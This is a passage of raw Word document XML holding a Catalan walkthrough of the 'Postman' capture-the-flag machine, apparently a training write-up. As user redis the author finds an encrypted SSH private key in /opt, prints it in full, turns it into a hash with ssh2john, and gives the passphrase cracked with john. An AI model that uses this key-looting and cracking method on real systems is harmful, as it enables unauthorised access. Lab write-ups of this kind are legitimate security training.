        <w:t>Distributor ID:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47865690" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ubuntu 18.04.3 LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3BFB6" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>18.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CE6417" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Codename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bionic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="348ED7E3" w14:textId="29E277F6" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/home/Matt$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A31ED9" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="68A9705E" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="48903A2F" w14:textId="17E44315" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t xml:space="preserve">17-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Despres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recneixement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maquian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’unic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que em </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trobat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>siguit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RSA al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>directori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10677A16" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="3318BE84" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/home/Matt$ cd / </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57519B21" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/$ cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B91E45" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08CB42BE" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78CC284B" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32CB11" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A534E6" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proc-Type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 4,ENCRYPTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB40B5" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>DEK-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: DES-EDE3-CBC,73E9CEFBCCF5287C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E41FB" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="19D63F69" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4B511F" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2373F206" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321888E7" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdnCWhzkA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248CCA6" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDFE820" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8FC26" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E26A1" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CCCC0" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7A88E" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA4260" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34614134" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F4A0D" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98863F" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49632190" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B62C2" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED89752" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563225E4" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE47478" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4354F4DD" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4290E3" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WhQFHkFOINwVEOtHakZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBD1CB1" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B02B667" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C49E4" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B5359" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9348E" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t>-----END RSA PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61428C" w14:textId="37F21769" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>redis@Postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00356E17" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="034FD074" w14:textId="52D8A23A" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La idea es petar la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>contrasenya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protegeix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="002719B0" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="2572CB11" w14:textId="0CEAB934" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF">
      <w:r>
        <w:t xml:space="preserve">18-&gt; La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>posem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>archiu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> al HOST,  i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un ssh2john , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>despres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>petem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john</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D88F85" w14:textId="77777777" w:rsidR="005A04FF" w:rsidRDefault="005A04FF" w:rsidP="005A04FF"/>
    <w:p w14:paraId="7C8C712C" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2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cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE965A" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t>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3ACDCB" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ File: hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5A916" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t>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645749" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">   1 │ id_rsa:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bcdfadc8381617435d43770fe9af72f6036343b41eedbec5cdcaa2838217d09d77301892540fd90a267889909cebbc5d567a9bcc3648</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D753807" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ fd648b5743360df306e396b92ed5b26ae719c95fd1146f923b936ec6b13c2c32f2b35e491f11941a5cafd3e74b3723809d71f6ebd5d5c8c9a6d72cba593a26442afaf8f8ac928e9e28bba71d9c25a1ce403f4f02695c6d5678e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F33A55" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 98cbed0995b51c206eb58b0d3fa0437fbf1b4069a6962aea4665df2c1f762614fdd6ef09cc7089d7364c1b9bda52dbe89f4aa03f1ef178850ee8b0054e8ceb37d306584a81109e73315aebb774c656472f132be55b092ced1fe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211CE42" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 08f11f25304fe6b92c21864a3543f392f162eb605b139429bb561816d4f328bb62c5e5282c301cf507ece7d0cf4dd55b2f8ad1a6bc42cf84cb0e97df06d69ee7b4de783fb0b26727bdbdcdbde4bb29bcafe854fbdbfa5584a3f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70228BB9" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 909e35536230df9d3db68c90541d3576cab29e033e825dd153fb1221c44022bf49b</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>56649324245a95220b3cae60ab7e312b705ad4add1527853535ad86df118f8e6ae49a3c17bee74a0b460dfce0683cf393681543f62e9fb28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78571890" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 67aa709d2e4c8bc073ac185d3b4c0768371360f737074d02c2a015e4c5e6900936cca2f45b6b5d55892c2b0c4a0b01a65a5a5d91e3f6246969f4b5847ab31fa256e34d2394e660de3df310ddfc023ba30f062ab3aeb15c3cd26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40563CEE" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ beff31c40409be6c7fe3ba8ca13725f9f45151364157552b7a042fa0f26817ff5b677fdd3eead7451decafb829ddfa8313017f7dc46bafaac7719e49b248864b30e532a1779d39022507d939fcf6a34679c54911b8ca789fef1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476C5099" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 590b9608b10fbdb25f3d4e62472fbe18de29776170c4b108e1647c57e57fd1534d83f80174ee9dc14918e10f7d1c8e3d2eb9690aa30a68a3463479b96099dee8d97d15216aec90f2b823b207e606e4af15466fff60fd6dae6b5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215CEB21" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 0b736772fdcc35c7f49e5235d7b052fd0c0db6e4e8cc6f294bd937962fab62be9fde66bf50bb149ca89996cf12a54f91b1aa2c2c6299ea9da821ef284529a5382b18d080aaede451864bb352e1fdcff981a36b505a1f2abd3a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B519E6" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 24848e0f3234ef73f3e2dda0dd7041630f695c11063232c423c7153277bbe671cb4b483f08c266fc547d89ff2b81551dabef03e6fd968a67502100111a7022ff3eb58a1fc065692d50b40eb379f155d37c1d97f6c2f5a01de13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF35EB" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ b8989174677c89d8a644758c071aea8d4c56a0374801732348db0b3164dcc82b6eaf3eb3836fa05cf5476258266a30a531e1a3132e11b944e8e0406cad59ffeaecc1ab3b7705db99353c458dc9932a638598b195e25a14051e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B4360A" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 14e20dc1510eb476a467f4e861a51036d453ea96721e0be34f4993a34b778d4111b29a63d69c1b8200869a129392684af8c4daa32f3d0a0d17c36275f039b4a3bf29e9436b912b9ed42b168c47c4205dcd00c114da8f8d82af7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89E3EA" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ 61e69e900545eb6fc10ef1ba4934adb6fa9af17c812a8b420ed6a5b645cad812d394e93d93ccd21f2d444f1845d261796ad055c372647f0e1d8a844b8836505eb62a9b6da92c0b8a2178bad1eafbf879090c2c17e25183cf1b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAFD95" w14:textId="26F97063" w:rsidR="005A04FF" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">     │ f1876cf6043ea2e565fe84ae473e9a7a4278d9f00e4446e50419a641114bc626d3c61e36722e9932b4c8538da3ab44d63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22D40A" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2"/>
    <w:p w14:paraId="4DCEB571" w14:textId="3386BF28" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:t xml:space="preserve">19-&gt; La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es computer</w:t>
      </w:r>
      <w:r w:rsidR="0011411F">
        <w:t xml:space="preserve">2008: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA5F47" w14:textId="77777777" w:rsidR="0011411F" w:rsidRDefault="0011411F" w:rsidP="007A1FC2"/>
    <w:p w14:paraId="7D8EDB07" w14:textId="77777777" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2"/>
    <w:p w14:paraId="77DED4F4" w14:textId="2956CF2D" w:rsidR="007A1FC2" w:rsidRDefault="007A1FC2" w:rsidP="007A1FC2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
